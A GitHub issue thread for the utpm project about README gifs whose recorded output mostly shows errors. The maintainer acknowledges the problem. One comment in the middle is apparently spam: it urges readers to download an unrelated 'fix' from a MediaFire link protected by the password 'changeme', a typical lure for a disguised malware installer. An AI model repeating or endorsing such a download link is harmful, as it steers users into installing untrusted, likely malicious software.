### ISSUE TITLE
README gifs are wrong?

### ISSUE THREAD

**Issue by emilyyyylime** [Thumuss/utpm#30]
Not sure if you noticed or if it's intentional, but you seem to have generated the README gifs automatically so you may have not noticed that their output mostly errors

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Thumuss** [comment]
> Not sure if you noticed or if it's intentional, but you seem to have generated the README gifs automatically so you may have not noticed that their output mostly errors

It does yes, I'm not into it for now I've just created the files. I will one time!
